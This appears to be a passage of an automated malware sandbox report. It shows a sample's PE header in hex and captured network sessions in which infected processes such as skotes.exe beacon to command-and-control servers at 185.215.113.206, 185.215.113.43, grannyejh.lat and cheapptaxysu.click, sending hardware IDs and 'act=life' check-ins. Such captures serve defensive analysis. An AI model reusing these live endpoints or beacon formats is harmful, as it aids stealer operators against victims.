                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 10 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 50 00 00 04 00 00 37 0d 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(P@@P7-@M$a$$ $h@.rsrc$x@.idata $z@mtxeekvl@+$<+|@yfmqoglcP,@.taggant0P",@


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          135192.168.2.450226185.215.113.20680
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:09.945636988 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:11.277718067 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:11 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:11.280272961 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCB
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 211
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 46 30 33 43 33 42 42 32 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="hwid"C1F03C3BB2381806970752------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="build"stok------EGHJKFHJJJKJJJJKEHCB--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:11.722060919 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:11 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                          Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          136192.168.2.450228185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:11.775886059 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 37 36 33 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: d1=1017633001&unit=246122658369


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          137192.168.2.45024334.107.221.8280
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:15.737366915 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                          Host: detectportal.firefox.com
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          Connection: keep-alive


                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.449731104.21.64.804436896C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:19 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:20:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                          2024-12-19 13:20:20 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:19 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=qqmndl7brv80e5c1imf0k47lsj; expires=Mon, 14 Apr 2025 07:06:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6wEu%2BYeiRJzhTKVghcSahv0ZSSJl4VEuxw1rTzznJHMal0pDcAUtHP5p2rbtkIwCOw5klqeTcDTWzqCzCyd2YUPjx%2FedTirSunPFg0GE%2FYAAPvZUW8g3aQW%2FQGCUr7oW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b0783f9d8cba-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1819&rtt_var=694&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1563169&cwnd=218&unsent_bytes=0&cid=8e06bf56846fdf41&ts=1647&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:20:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                          2024-12-19 13:20:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          1192.168.2.449742104.21.67.1464435552C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:30 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                          Host: cheapptaxysu.click
                                                                                                                                                                                                                                                          2024-12-19 13:20:30 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                          2024-12-19 13:20:31 UTC556INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:30 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5tYH%2FZElwdGutdGI3oqzGUCdnDJCUfOSLZqy48rGvIYS0c0wT7I6142BjkEJz05fmEb%2FgKzOOp2PYPuJDz67KNSnU4VhImqAqMPpkQCetrmCt8at2yCzCeYNGh3q3EOTOlLFfeQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b0c1189872a5-EWR
                                                                                                                                                                                                                                                          2024-12-19 13:20:31 UTC813INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                                                                          Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                                                                                          2024-12-19 13:20:31 UTC1369INData Raw: 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28
                                                                                                                                                                                                                                                          Data Ascii: yles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById(
                                                                                                                                                                                                                                                          2024-12-19 13:20:31 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e
                                                                                                                                                                                                                                                          Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action
                                                                                                                                                                                                                                                          2024-12-19 13:20:31 UTC1005INData Raw: 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d
                                                                                                                                                                                                                                                          Data Ascii: "cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Perform
                                                                                                                                                                                                                                                          2024-12-19 13:20:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          2192.168.2.449745104.21.67.1464435552C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:32 UTC355OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Cookie: __cf_mw_byp=ycBd0i69VFeufZDq_PXg.QmfyYf0XqPyz1V3O9bUgV4-1734614430-0.0.1.1-/api
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                          Host: cheapptaxysu.click
                                                                                                                                                                                                                                                          2024-12-19 13:20:32 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 26 6a 3d
                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=CZJvss--&j=
                                                                                                                                                                                                                                                          2024-12-19 13:20:34 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:33 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=hdtljpsj62928g1eckjeo3f08r; expires=Mon, 14 Apr 2025 07:07:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2RGgG9mvPzZgEmbTxhwg5tV7TcRkAdYGRF86thy%2BKRQNoFdJcm5wyao99bozPOVZJ2eOrIBKjsbl6r5%2BiSSHEsyibN0BOciyIN9vVZNcK8v73vKdsEdmc4MmvFdGqS5gmmqTvLs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b0ce7c277c8a-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2112&min_rtt=2020&rtt_var=942&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1033&delivery_rate=1057971&cwnd=241&unsent_bytes=0&cid=a12bab9aeda848a6&ts=1707&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:20:34 UTC242INData Raw: 34 39 31 63 0d 0a 4b 4c 66 71 32 50 4a 49 4c 6b 4b 2b 52 32 48 4e 6f 53 47 2b 7a 4b 7a 32 5a 33 41 6a 74 50 64 79 78 32 53 4c 69 5a 42 2b 72 6e 4e 54 6c 5a 7a 36 79 48 77 43 59 4d 30 69 51 2f 66 56 55 38 75 70 67 4e 51 47 46 41 47 4f 6b 52 4f 72 46 2b 36 6c 73 67 6a 44 55 52 4c 52 69 37 53 42 4c 51 4a 67 32 7a 39 44 39 2f 70 61 6e 4b 6e 43 31 46 31 53 52 74 36 56 45 36 73 47 36 75 4c 2f 44 73 49 51 51 4e 75 4e 73 4a 63 72 53 69 50 53 4b 67 53 6f 78 45 44 55 6f 73 57 62 44 78 30 42 6d 4e 55 58 76 55 61 78 71 39 30 62 32 68 4a 6c 31 70 6d 7a 30 44 55 43 4f 5a 77 69 44 2b 2b 62 41 39 2b 70 7a 70 6f 42 46 45 6a 63 6e 78 71 6a 42 2b 2f 6a 34 42 66 49 47 30 44 56 6a 72 47 64 49 6c 34 75 32 43 30 50 72 73 35 41 6e 4f 43 4f
                                                                                                                                                                                                                                                          Data Ascii: 491cKLfq2PJILkK+R2HNoSG+zKz2Z3AjtPdyx2SLiZB+rnNTlZz6yHwCYM0iQ/fVU8upgNQGFAGOkROrF+6lsgjDURLRi7SBLQJg2z9D9/panKnC1F1SRt6VE6sG6uL/DsIQQNuNsJcrSiPSKgSoxEDUosWbDx0BmNUXvUaxq90b2hJl1pmz0DUCOZwiD++bA9+pzpoBFEjcnxqjB+/j4BfIG0DVjrGdIl4u2C0Prs5AnOCO
                                                                                                                                                                                                                                                          2024-12-19 13:20:34 UTC1369INData Raw: 6b 78 31 53 47 5a 62 47 49 71 59 58 2b 50 37 2f 44 4d 70 52 56 5a 75 52 2b 70 63 6d 44 48 69 63 4c 51 2b 68 78 6b 44 54 71 63 2b 55 46 78 31 42 31 5a 30 59 6f 51 7a 6d 35 50 30 53 78 68 5a 43 33 49 2b 31 6c 79 4a 4b 4c 39 39 6c 54 65 2f 45 57 35 7a 32 6a 72 51 56 45 55 4c 43 6d 41 48 6c 47 61 66 79 73 68 76 41 55 52 4b 56 6a 72 53 52 4a 30 77 79 31 43 34 49 71 74 46 49 31 61 50 44 6c 41 67 59 54 74 57 56 46 36 38 4d 35 75 48 32 45 63 45 58 53 74 58 49 39 4e 41 74 56 47 43 45 5a 53 43 71 30 30 54 51 75 49 79 75 52 51 30 50 7a 39 55 58 71 55 61 78 71 2f 6f 5a 7a 78 4a 42 32 6f 75 79 6d 7a 68 4d 4d 74 6f 6f 42 72 33 46 52 74 4b 6b 7a 59 59 50 48 45 66 56 6e 42 75 73 41 2b 37 76 73 6c 4b 4d 46 6c 4b 56 30 50 71 78 4a 30 63 73 31 6a 49 44 37 39 77 4e 78 65 37
                                                                                                                                                                                                                                                          Data Ascii: kx1SGZbGIqYX+P7/DMpRVZuR+pcmDHicLQ+hxkDTqc+UFx1B1Z0YoQzm5P0SxhZC3I+1lyJKL99lTe/EW5z2jrQVEULCmAHlGafyshvAURKVjrSRJ0wy1C4IqtFI1aPDlAgYTtWVF68M5uH2EcEXStXI9NAtVGCEZSCq00TQuIyuRQ0Pz9UXqUaxq/oZzxJB2ouymzhMMtooBr3FRtKkzYYPHEfVnBusA+7vslKMFlKV0PqxJ0cs1jID79wNxe7
                                                                                                                                                                                                                                                          2024-12-19 13:20:34 UTC1369INData Raw: 45 66 5a 6d 42 7a 6c 53 4b 6e 73 36 6c 79 55 55 57 44 57 6e 4c 6d 61 61 48 6b 6a 30 69 73 45 75 59 4e 63 6b 72 65 4f 6b 77 6c 53 47 5a 61 59 45 61 30 41 2b 2b 54 2f 48 38 49 66 52 64 43 48 73 70 41 71 51 53 58 59 4c 67 69 73 7a 6b 66 4f 70 4d 36 63 41 42 4e 4c 33 4e 56 65 35 51 48 78 71 36 70 63 2f 51 5a 42 6c 37 32 35 6e 69 52 4c 4e 70 77 36 54 62 61 44 52 4e 44 75 6c 74 51 49 47 6b 54 54 6d 68 47 76 43 4f 7a 68 2f 68 54 43 45 6c 6a 61 6a 4c 71 63 49 6b 59 74 30 69 45 4c 70 73 68 49 32 71 37 50 6e 6b 56 63 41 64 47 4e 55 50 31 47 33 65 7a 2b 45 63 4e 54 66 39 61 47 74 4a 63 38 44 44 2b 53 50 45 4f 6f 7a 77 4f 45 37 73 4b 64 42 52 6c 4c 30 70 55 58 71 41 50 71 37 50 45 52 79 78 74 45 30 6f 79 32 6d 53 64 4b 49 4e 73 68 42 72 33 47 53 74 43 69 6a 74 70 46
                                                                                                                                                                                                                                                          Data Ascii: EfZmBzlSKns6lyUUWDWnLmaaHkj0isEuYNckreOkwlSGZaYEa0A++T/H8IfRdCHspAqQSXYLgiszkfOpM6cABNL3NVe5QHxq6pc/QZBl725niRLNpw6TbaDRNDultQIGkTTmhGvCOzh/hTCEljajLqcIkYt0iELpshI2q7PnkVcAdGNUP1G3ez+EcNTf9aGtJc8DD+SPEOozwOE7sKdBRlL0pUXqAPq7PERyxtE0oy2mSdKINshBr3GStCijtpF
                                                                                                                                                                                                                                                          2024-12-19 13:20:34 UTC1369INData Raw: 73 4a 35 51 48 6c 71 36 70 63 78 52 68 59 32 34 61 7a 6e 53 78 45 4a 39 49 6f 43 4b 6e 49 52 4e 75 6f 77 35 77 49 46 30 4c 58 6b 52 71 33 42 65 4c 68 2f 78 61 4d 58 77 72 53 6b 50 72 49 61 6d 73 73 39 54 55 59 76 64 55 44 77 2b 44 58 31 41 49 65 41 59 37 56 45 36 6f 50 35 75 50 36 45 38 4d 56 52 4e 4f 4f 74 35 55 6c 52 6a 4c 55 4b 77 36 6b 7a 45 6a 4f 72 73 4f 51 43 52 5a 4a 33 5a 39 51 36 30 62 75 38 37 4a 45 6a 43 52 48 32 6f 69 35 68 6d 70 54 62 73 56 6c 42 4b 4f 44 47 35 79 69 77 4a 51 4b 48 6b 33 64 6e 52 47 70 43 4f 37 75 2b 78 54 45 41 30 76 52 67 4c 75 65 4a 55 30 6b 32 53 41 48 71 4d 64 46 30 2b 36 41 31 41 49 4b 41 59 37 56 50 34 49 7a 71 38 72 49 58 4e 4e 66 55 35 57 50 74 74 42 79 44 43 7a 66 4b 51 75 67 78 55 72 51 70 4d 65 66 43 52 6c 46 32
                                                                                                                                                                                                                                                          Data Ascii: sJ5QHlq6pcxRhY24aznSxEJ9IoCKnIRNuow5wIF0LXkRq3BeLh/xaMXwrSkPrIamss9TUYvdUDw+DX1AIeAY7VE6oP5uP6E8MVRNOOt5UlRjLUKw6kzEjOrsOQCRZJ3Z9Q60bu87JEjCRH2oi5hmpTbsVlBKODG5yiwJQKHk3dnRGpCO7u+xTEA0vRgLueJU0k2SAHqMdF0+6A1AIKAY7VP4Izq8rIXNNfU5WPttByDCzfKQugxUrQpMefCRlF2
